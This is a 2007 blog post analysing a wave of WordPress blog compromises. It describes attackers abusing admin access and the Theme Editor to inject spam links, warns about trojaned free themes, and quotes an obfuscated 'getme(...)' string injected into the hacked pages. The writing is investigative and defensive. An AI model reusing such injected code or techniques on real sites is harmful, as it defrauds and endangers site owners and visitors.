Tips, Tricks, Tools & Techniques

for Internet Business, Life, the Universe and Everything

RSS Feed

More On WordPress Security Issues (a.k.a. The Al Gore Hack)

28 November, 2007 (12:05) | Security, WordPress | By: Nick Dalton

The Symantec Security Response Weblog has a good writeup about the hack and the elaborate network scheme behind it. Their conclusions mostly match those in my post yesterday.

I still haven’t been able to track down the exact exploit used to compromise all these WordPress blogs. All the compromised blogs that I’ve examined run older versions of WordPress (<= 2.0.6). There are several older vulnerabilities that allow an attacker to assume admin privileges.
With admin privileges the attacker can use the Theme Editor to add their spam links to the footer template. Using the Theme Editor gets around the problem of knowing which file to edit since each theme is installed in a separate directory. If the attacker only had access to the file system (e.g. via ftp), then there is no easy way to know which is the active WordPress theme.

In a most likely unrelated note, GigaOM has a post about security issues in WordPress Themes. It turns out that some bad guys are taking free WordPress themes and modifying them slightly so that they can run arbitrary code on each web server running that WordPress theme. This is a huge security risk!

Follow the basic security rule: Don’t download files from untrusted sources. Just because someone is advertising their free WordPress template site on AdWords doesn’t mean that the site is legitimate.

The reason I say that the two security issues are unrelated is because the compromised blogs do not share a common WordPress theme.
If anyone who has been compromised would be willing to share their web access logs, I would be very interested in examining them.

When looking at the HTML source of web pages that have been compromised I noticed that not only did the attacker add their spam links, they also added an AdSense block. First I thought that each blog just happened to have their AdSense JavaScript in the same position at the bottom of the page. But when I saw the AdSense code on I figured that something was wrong. Why would have AdSense on their site?

After closer examination I realized that all compromised sites had the exact same AdSense code:
getme(' 636D6071685F676C255D5A68385E565D545C612E64334D100E4D5 45652090A0E5252564840083D414A4641354C0FF83E3E3C32F306');

Someone at Google should be able to find out who is benefiting financially from that AdSense code. Money always leaves a trail.

Write a comment